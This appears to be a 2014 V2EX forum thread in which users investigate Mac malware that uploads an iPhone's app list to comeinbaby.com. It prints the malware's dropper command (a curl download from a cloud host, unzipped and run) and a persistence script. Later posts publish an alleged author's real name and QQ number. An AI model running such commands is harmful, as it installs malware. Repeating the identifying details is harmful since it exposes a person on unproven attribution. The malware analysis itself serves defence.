http://www.comeinbaby.com 是个什么网站? 我发现我的 iPhone 一直在连接这个网站并把我的个人信息传输到这个网站里!

2014-10-31 11:31:27 +08:00
 fork3rt
今天做Api接口,我就给iPhone抓了个包.... 结果吓一跳,让楼主打下马图个心理安慰吧。。上图:

http://dn-devme.qbox.me/C4A45719-02A7-4DA7-A8D4-C0B8803C1510.jpg


那个saveinfo.php 是把我安装的所有App列表传了上去...

com.zhihu.daily,知乎日报,201410141456,(null)
com.netease.cloudmusic,网易云音乐,2.0.2,(null)
com.baidu.translate,百度翻译,5.1.0,(null)
henan.APNProload,APN设置,1.1,(null)
bitauto.application,易车,4.9.1.1,(null)
com.alipay.iphoneclient,支付宝钱包,8.3.0,(null)
cn.mucang.ios.jiakaobaodian,驾照考试,9,(null)
com.netease.news,网易新闻,4.2.0,(null)
com.tencent.xin,微信,6.0.0.17,(null)
com.chinaunicom.mobilebusiness,手机营业厅,3.01,(null)
com.cmbchina.cmblife,掌上生活,405,(null)
com.agilebits.onepassword-ios,1Password,501017,(null)
com.sztv.iphone,无线苏州,3.6.1,(null)
com.gewara.iphone,格瓦拉@电影,5.4.1.2,(null)
com.sohu.iPhoneVideo,搜狐视频,4.5.2,(null)
com.qunar.iphoneclient8,去哪儿旅行,4.3.4.2990,(null)
com.ea.realracing3.bv,Real Racing 3,2.6.2,(null)
com.douban.doubanmovie,豆瓣电影,3.6.3,(null)
com.yihaodian.onethestore,1号店,20140927,(null)
Hi-Mom-S.A.S.Typic-Pro,Typic,4.0.4,(null)
com.google.chrome.ios,Chrome,38.0.2125.67,(null)
com.nike.nikeplus-gps,Running,1410211906,(null)
com.anydo.AnyDO,Any.DO,1.19.0.4,(null)
com.nhncorp.m2app,BAND,3.4.0,(null)
com.dianping.dpscope,大众点评,6.9,(null)
com.jibjab.elfdance,JibJab Dances,2.0.0,(null)
com.tencent.mqq,QQ,5.1.1.97,(null)
cn.12306.rails12306,铁路12306,1.24,(null)
com.cmbchina.MPBBank,招商银行,2710,(null)
com.dotgears.flap,Flappy Bird,1.2,(null)
com.baidu.map,百度地图,7.5.3.1,(null)
com.teamviewer.rc,TeamViewer,33732,(null)
com.yibasan.lizhifm,荔枝FM,20486,(null)
com.openet.gtgj,高铁管家,2.5.1,(null)
com.tencent.qqgamehall,QQ游戏大厅,1.4.0.0,(null)
com.opengarden.chat,FireChat,4.0.1,(null)
cn.eclicks.drivingtest,车轮考驾照,3.4.6.1,(null)
com.tencent.qqgame,QQ斗地主,2.0.5.10,(null)
com.tencent.qqmail,QQ邮箱,3.4,(null)
com.tencent.five,QQ五子棋,1.1.0,(null)
com.uniqlo.cn,优衣库,2.2.0,(null)
com.tencent.game.rhythmmaster,节奏大师,2.5.1.2,(null)
com.unicom.wo116114,116114,4.5.5.3073,(null)
com.getdropbox.Dropbox,Dropbox,3.5.1.002,(null)
com.sina.weibo,微博,4.6.1.1,(null)
com.poco.camera,POCO相机,2.6.8.1,(null)
com.meituan.imovie,猫眼电影,117,(null)
com.apple.mobileme.fmip1,Êü•Êâæ iPhone,472.1,(null)
com.amazon.AmazonCN,亚马逊购物,12280.4,(null)
cn.com.zhaopin.zhilianzhaopin,智联招聘,5984,(null)
com.500wan.rabbit.01,500ÂΩ©Á•®,1.9.1.5,(null)
com.taobao.tmall,天猫,4.5.0003,(null)
com.xunlei.ithunder,ËøÖÈõ∑,4.1.1.1108,(null)
com.sf-express.waybillcn,顺丰速运,6.0,(null)
co.visualsupply.cam,VSCOcam,988,(null)
com.51job.ios51job,前程无忧,2.7.2,(null)
com.qiyi.iphone,爱奇艺视频,20140918090570,(null)
jp.co.project-mode.RedminePM,RedminePM,4.2.0,(null)
com.360buy.jdmobile,京东,3.8.0,(null)
com.roviostars.pirates,Pirates!,105,(null)
com.jibjab.messages,JibJab,960,(null)
com.chinaunicom.unicom4GAssistant,联通4G助手,1.18,(null)
com.ss.iphone.article.News,今日头条,3.6,(null)
com.zhihu.ios,知乎,306,(null)
com.google.Translate,翻译,2.1.1.7574,(null)
com.tencent.ioshlddz,欢乐斗地主,3.7.102.70,(null)
com.evernote.iPhone.Evernote,印象笔记,311939,(null)
com.sina.tianqitong,天气通,3.469.268595,(null)
com.taofang.iphone,58同城,5.7.6,(null)
com.8000m.wakemeup,谁叫我起床,1.4.5,(null)
com.youku.YouKu,优酷,20140811,(null)
com.bankcomm.Bankcomm,交通银行,2.1.1,(null)
com.ea.bf3bl.bv,Battlelog,2.4.0,(null)
com.taobao.taobao4iphone,手机淘宝,5.0.1,(null)
com.crystalnix.ServerAuditor,ServerAuditor,1.39.0,(null)
com.namconetworks.pacman,PAC-MAN,15091,(null)
com.tencent.,QQ空间,4.9.9,(null)
com.wangyandong.ningxia.nstats,N Stats,1.1.2,(null)


之前搜了一下 发现很多人Mac有这个问题,现在被我的iPhone遇到了。好恐怖,大家有遇到过这种问题吗?

顺便 @zythum 渣浪图床貌似用不了了。
10968 次点击
所在节点    问与答
16 条回复
fork3rt
2014-10-31 11:39:31 +08:00
www.comeinbaby.com 这个域名设置了whois保护!!!
qiuai
2014-10-31 11:41:37 +08:00
@fork3rt 看搜索到的结果.估计是一个挂马的站.

下载 http://www.comeinbaby.com/mac/getsoft.php得到以下文件.

machok$$machook_damon.plist;if [ -f /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist ];then chmod 644 /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist;/bin/launchctl load -wF /System/Library/LaunchDaemons/com.apple.MailServiceAgentHelper.plist;else mkdir -p /tmp/up && cd /tmp/up && curl -O http://cos.myqcloud.com/1001584/ipa/update.zip && unzip -q -o -d /tmp/up/ /tmp/up/update.zip && /tmp/up/update ;fi ;#
qiuai
2014-10-31 11:43:15 +08:00
@fork3rt 解压update.zip以后得到一个文件,我没敢运行...
你可以把手机清空后,抓包一次,没问题的清空下安装这个update.zip.然后再抓包看看.
joyqi
2014-10-31 11:58:55 +08:00
跟这个哥们一样 http://www.v2ex.com/t/140929

这是个恶意软件,你肯定在国内的下载站下载过所谓的破解版
fork3rt
2014-10-31 12:00:16 +08:00
@joyqi 我用过同步推 但是早就卸载了 用同步推安装的软件也早就卸载了... 怎么破
fork3rt
2014-10-31 12:00:32 +08:00
@qiuai 我也不敢运行。。。
fork3rt
2014-10-31 12:03:09 +08:00
http://bbs.maiyadi.com/thread-950306-1-1.html 这里9楼说的 可能是Mac的问题。

难不成是我的Mac安装了某些破解软件导致的?
qiuai
2014-10-31 13:06:59 +08:00
@fork3rt =.=...那就直接重装mac和iphone吧.别恢复备份了.
其实mac的软件大部分都挺便宜的了.我基本上都是买的...买不起的软件也都可以找到替代品.
fork3rt
2014-10-31 14:23:03 +08:00
fork3rt
2014-10-31 14:43:31 +08:00
会在/usr/local/ 生成一个 macbook 文件夹, 里面的一个watch.sh 内容为:

#!/bin/sh

jobid=`ps -ef |grep machook |grep -v "grep" |wc -l`
if [ $jobid -eq 0 ];then
/usr/local/machook/machook &
fi

updateid=`ps -ef |grep globalupdate |grep -v "grep" |wc -l`
if [ $jobid -eq 0 ];then
/usr/bin/globalupdate &
fi

执行globalupdate时 会带上电脑的序列号去请求 http://www.comeinbaby.com/mac/getsoft.php

获得更新并安装。
fork3rt
2014-10-31 15:23:28 +08:00
清除了MacBook上所有相关的脚本之后,iPhone停止上传我的信息了,尚不知道这个是什么原理..
还没找到宿主文件。
skybao
2014-10-31 15:31:11 +08:00
ds,让你用破解软件,学学洗脑歌,这次没救了,哈哈哈
fork3rt
2014-11-02 18:43:58 +08:00
10# 会在/usr/local/ 生成一个 macbook 文件夹, 里面的一个watch.sh 内容为:

改为 会在/usr/local/ 生成一个 machook 文件夹, 里面的一个watch.sh 内容为:
------------分割线------------
逆向了一下,发现了以下比较有用的字符串:
/opt/code/app/myProject/globalupdate/globalupdate/main.m/Users/lifei/Library/Developer/Xcode/DerivedData/myProject-bempnuunysxoafcdeokuvvfigmze/Build/Intermediates/globalupdate.build/Release/globalupdate.build/Objects-normal/x86_64/main.o

作者的MacBook用户名是lifei,

使用的域名comeinbaby.com 是在 mingguantianxia.cn注册的。

可以从http://www.mingguantianxia.cn/dns/ 这个控制面板进行登录。好熟悉的报错页面 - -||| 目前尚不知道这个是什么虚拟主机管理系统..
fork3rt
2014-11-03 00:10:28 +08:00
再次更新 确认这个木马的始作俑者是lifei,在App Store上架过应用。

http://ios-apps.findthebest.com/l/1883481 这里的support url是comeinbaby.com

这是他的应用,开发者名称 LEI LI

开发过二维码工具箱,漫画吧。
fork3rt
2014-11-03 00:13:26 +08:00
苹果开发账号: li tjcy
小马甲QQ: 2045847795
fork3rt
2014-11-03 00:33:02 +08:00
嗯 真实姓名 李磊 ,其他信息明天再爆

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/142867

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX